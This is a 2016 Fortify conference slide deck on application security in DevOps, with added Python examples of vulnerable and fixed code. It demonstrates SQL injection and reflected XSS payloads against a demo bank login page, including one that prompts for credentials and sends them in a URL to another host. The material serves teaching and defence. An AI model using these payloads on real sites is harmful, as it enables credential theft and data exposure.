Discover Best of Show 2016, 2-3 March 2016, Düsseldorf
Software Security in the Age of DevOps. Lucas von Stockhausen, Regional Product Manager, Fortify
The case for application security. "I am secure, I have a firewall."
Malware over the years. Source: HPE Security Research Cyber Risk Report 2016
There is a breach in the headlines almost every day. http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/
Aircraft accidents over the years (chart): number of accidents and fatalities per year, excluding sabotage and shoot-downs. Source: https://aviation-safety.net/statistics/period/
The increase in attacks is constant. Sources: Ponemon Cost of Cyber Crime Study 2012 and 2015
Existing network- and perimeter-based security is insufficient: 84% of breaches exploit vulnerabilities in the application layer, yet the ratio of spending between perimeter security and application security is 23-to-1. - Gartner Maverick Research: Stop Protecting Your Apps; It's Time for Apps to Protect Themselves (2014)
Basic hacking example
Live example: SQL injection, Telnet, cross-site scripting
SQL injection

Vulnerable code: the item name is taken straight from the request and concatenated into the query string.

    String username = ctx.getAuthenticatedUserName();
    String itemname = request.getParameter("itemname");
    String query = "SELECT * FROM items WHERE owner = '" + username + "' AND itemname = '" + itemname + "'";
    ResultSet rs = stmt.executeQuery(query);

With username = lucas and itemname = x' or 1=1; -- the concatenation becomes:

    "SELECT * FROM items WHERE owner = '" + "lucas" + "' AND itemname = '" + "x' or 1=1; --" + "'"

The resulting query returns every row regardless of owner, because the injected OR clause is always true and the comment marker discards the closing quote:

    SELECT * FROM items WHERE owner = 'lucas' AND itemname = 'x' or 1=1; -- '
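An added example, not from the slides: the same lookup run against a constructed in-memory SQLite table, once with the concatenated query and once with a bound parameter, so the effect of the payload above and of the fix can be compared directly. The table contents are constructed sample data.

```python
# Added example (not from the slides): the items lookup from the SQL injection
# slide, run against a constructed in-memory SQLite table, once with string
# concatenation and once with a bound parameter.
import sqlite3

# Constructed sample data: two owners, three items.
ROWS = [("lucas", "hat"), ("lucas", "coat"), ("alice", "keys")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (owner TEXT, itemname TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)", ROWS)
    return conn


def lookup_concat(conn: sqlite3.Connection, username: str, itemname: str) -> list:
    # Vulnerable: the untrusted itemname becomes part of the SQL text, so
    # "x' or 1=1; --" turns the WHERE clause into one that is always true.
    query = ("SELECT * FROM items WHERE owner = '" + username
             + "' AND itemname = '" + itemname + "'")
    return conn.execute(query).fetchall()


def lookup_param(conn: sqlite3.Connection, username: str, itemname: str) -> list:
    # Hardened: both values are bound as data; the same payload is now just a
    # literal item name that matches nothing.
    query = "SELECT * FROM items WHERE owner = ? AND itemname = ?"
    return conn.execute(query, (username, itemname)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "x' or 1=1; --"
    print("concatenated:", lookup_concat(db, "lucas", payload))   # all three rows
    print("parameterized:", lookup_param(db, "lucas", payload))   # []
```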
SQL injection (demo)
Telnet session
XSS: Cross-Site Scripting
Real-world payloads
Real-world payloads. So, what is XSS truly capable of? What can you execute?
Simple answer: JavaScript. Wait. That weak-sauce web scripting language that you had to learn in college back in the day? How bad could it be?
JavaScript is a full-featured programming language: object-oriented, C-like syntax, extremely powerful, native in every browser.
In sum, being able to run JavaScript in a victim's browser has a LOT of potential. Let's take a look at a possible attack and how to build it up. Let's go to http://legacy.webappsecurity.com
Real-world payloads: http://legacy.webappsecurity.com
Real-world payloads http://legacy.webappsecurity.com/banklogin.asp?err=<script>alert("buh");</script>
Real-world payloads http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('please enter your username',' '); password=prompt('please enter your password',' '); alert("username="%2b%0ausername%2b%0a" and password="%2b%0apassword);</script>
Real-world payloads http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('please enter your username',' '); password=prompt('please enter your password',' '); document.write('<img src="http://localhost:8080/splc/images/top.jpg" alt=""'); document.write('<br>invalid Login: '%2B%0Ausername);</script>
Real-world payloads http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('please enter your username',' '); password=prompt('please enter your password',' '); document.write('<img src="http://localhost:8080/splc/listmyitems.do?username='%2busername%2b'%26password='%2bpasswo rd%2b'">'); document.write('<br>invalid Login: '%2Busername);</script>
Real-world payloads: there are many other possibilities and opportunities. Remember, if these are the easy options, imagine what others are capable of!
There are a number of ways to launch the actual attack: stored XSS, reflected XSS, or owning a page that a victim visits. Remember, navigating to a page is permission to run what's on that page; consider visiting a web page an act of significant trust.
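An added example, not from the slides: a minimal Python model of the banklogin.asp error message being reflected into the page. The unencoded version reproduces the bug that lets the payloads above run; the encoded version HTML-encodes the err value at the point where it enters the HTML body, so the same input is shown as inert text. The page fragment is an assumption, since the real banklogin.asp markup is not on the slides, and the request URL is the first payload shown above.

```python
# Added example (not from the slides): how the "err" query parameter of
# banklogin.asp is reflected into the page, unencoded versus HTML-encoded.
import html
from urllib.parse import unquote

# Constructed request, using the first payload shown on the slides.
REQUEST_URL = 'http://legacy.webappsecurity.com/banklogin.asp?err=<script>alert("buh");</script>'

# Assumed page fragment; the real banklogin.asp markup is not on the slides.
TEMPLATE = '<div class="error">{err}</div>'


def err_param(url: str) -> str:
    """Return the decoded value of the err query parameter.

    A plain split is used instead of parse_qs so that a ';' inside the
    payload is kept as part of the value on every Python version.
    """
    query = url.partition("?")[2]
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name == "err":
            return unquote(value)
    return ""


def render_unencoded(err: str) -> str:
    # Vulnerable: untrusted text is placed into the HTML as-is, so a <script>
    # element in err becomes part of the document and executes.
    return TEMPLATE.format(err=err)


def render_encoded(err: str) -> str:
    # Hardened: encode for the HTML element context so <, >, &, " and '
    # become entities; the browser displays the payload and runs nothing.
    return TEMPLATE.format(err=html.escape(err, quote=True))


if __name__ == "__main__":
    value = err_param(REQUEST_URL)
    print(render_unencoded(value))   # contains a live <script> element
    print(render_encoded(value))     # contains &lt;script&gt; text only
```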
What is the reason?
Today's approach > expensive, reactive
    1. Somebody builds insecure software.
    2. IT deploys the insecure software.
    3. We are breached, or pay someone to tell us our code is insecure.
    4. We convince and pay the developer to fix it.
Cost: why it doesn't work. Securing in production is 30x more costly (chart: relative cost of fixing a defect across requirements, coding, integration/component testing, system testing and production, with bars of 2x, 5x, 10x, 15x and 30x). After an application is released into production, it costs 30x more than during design. Source: NIST
The right approach > systematic, proactive
    1. Embed security into the SDLC development process, whether the code is in-house, outsourced, commercial or open source.
    2. Leverage a security gate to validate the resiliency of internal or external code before production.
    3. Improve SDLC policies; monitor and protect software running in production.
This is application security.
The help: Static Application Security Testing (SAST), Dynamic Application Security Testing (DAST), Interactive Application Security Testing (IAST), Runtime Application Self-Protection (RASP)
Example process for analysis (diagram). Roles: Development Teams (Developer, Development Manager, IDE) and Security (Security Auditor, Project Security Lead, CISO). Systems: Source Code Repository(s), Central Build Server(s) with Build Tool and Fortify SCA, WebInspect, Fortify SSC Server, Fortify CM, AWB, Defect Tracking System, Monitor. Steps: 1. Identify, 2. Audit, 3. Assign, 4. Fix, 5. Validate, 6. Report.
Movement to DevOps. Business leaders have agility at the top of their priorities as they prepare for a fast-paced, very competitive future. Processes need to be further streamlined to minimize resource consumption and reduce time to market. Security context: development organizations can save time and money by building in security early in the development process.
Challenges in a DevOps environment: developers are not security experts; security testing is an afterthought; pressure to push software into production leaves no time for security; security assessments take up resources.
Introducing HPE Security DevInspect: bringing application security closer to the developer. An AppSec solution created for developers to identify and remediate security vulnerabilities in source code within the native developer environment. Brings market-leading AppSec technologies directly to the developer, ensuring secure code as you shift left in your development process. Real-time, instant security results as the developer is writing code. Enables developers to assess for security weaknesses.
End-to-end application security (grid of static, dynamic and runtime coverage across application development): on-premise with DevInspect and App Defender, on-demand with Fortify on Demand and App Defender.
HPE Security DevInspect: static code analysis (real-time lightweight analysis of the source code), dynamic analysis, runtime analysis, documentation.
What's included in DevInspect 1.0? Static code analysis (real-time lightweight analysis of the source code), integration for Fortify Software Security Center (SSC), integration for Fortify on Demand (FoD), documentation.
Key benefits. Designed for the developer: fully integrated into the native development environment (IDE), supports the DevOps toolchain, provides thorough and robust software security analysis of an application. Instant results (fast): inline analysis of the source code as the developer types, providing immediate feedback; out-of-the-box results, no configuration required. Continuous feedback: continuously updated security findings as code is written; tracks findings and guides developers toward remediation.
Example process for static analysis in DevOps (diagram). Roles: Development Teams (Developer, Development Manager, IDE) and Security (Security Auditor, Project Security Lead, CISO). Systems: Source Code Repository(s), Central Build Server(s) with Build Tool and Fortify SCA, WebInspect, Fortify SSC Server, Fortify CM, AWB, Defect Tracking System, Monitor. Steps: 1. DevInspect in the IDE, 2. Check-in, 3. Milestone scan, 4. Validate, 5. Report.
Security Assistant: real-time lightweight analysis of the source code; Fortify menu for additional options; Fortify icon added to the icon bar; detailed remediation advice; vulnerable line of code highlighted, with a tooltip for additional information; all issues detected in the project.
Thank you. lvonstockhausen@hpe.com